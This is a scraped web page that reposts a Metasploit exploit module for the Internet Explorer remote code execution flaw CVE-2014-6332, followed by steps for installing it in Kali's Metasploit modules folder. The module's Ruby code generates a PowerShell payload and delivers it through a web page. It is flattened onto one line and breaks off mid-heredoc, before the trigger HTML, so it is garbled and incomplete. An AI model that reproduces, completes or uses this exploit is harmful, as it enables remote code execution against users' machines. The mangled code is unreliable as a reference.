IE Remote Code Execution Vulnerability (CVE-2014-6332) Exploitation Test Method

Source: Internet
Author: User
Tags cve

IE Remote Code Execution Vulnerability (CVE-2014-6332) Exploitation Test Method

Test the exploitation of Metasploit Framework

All IE versions are used for blocking. However, because the exp in msf calls powershell, The exp code in msf (Metasploit Framework) takes effect only for the system where powershell is installed. Here we test the affected machine as windows2008.

This site provides security tools and procedures (methods) that may be offensive. They are only used for security research and teaching, and are at your own risk!

Msf code:
 

### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'require 'msf/core/exploit/powershell'class Metasploit3 < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::Powershell  def initialize(info={})  super(update_info(info,    'Name'   => "Windows OLE Automation Array Remote Code Execution",    'Description'=> %q{      This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.       Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.      },    'License'=> MSF_LICENSE,    'Author' =>    [      'IBM', # Discovery    'yuange <twitter.com/yuange75>', # PoC    'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit      'Wesley Neelen <security[at]forsec.nl>'  #Metasploit    ],    'References' =>    [      [ 'CVE', '2014-6332' ]    ],    'Payload'=>    {      'BadChars'=> "\x00",    },    'DefaultOptions'  =>    {      'EXITFUNC' => "none"    },    'Platform'   => 'win',    'Targets'=>      [      [ 'Automatic', {} ]    ],    'Privileged' => false,    'DisclosureDate' => "November 12 2014",    'DefaultTarget'  => 0))  end  def on_request_uri(cli, request)  payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })  payl.slice! "powershell.exe "    html = <<-EOS<!doctype html>

Code import Metasploit Framework

In the kali system, copy the source code above to the following file.

vim /usr/share/metasploit-framework/modules/exploits/windows/browser/ms14_064_safemodedisable.rb

 

Test

 

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.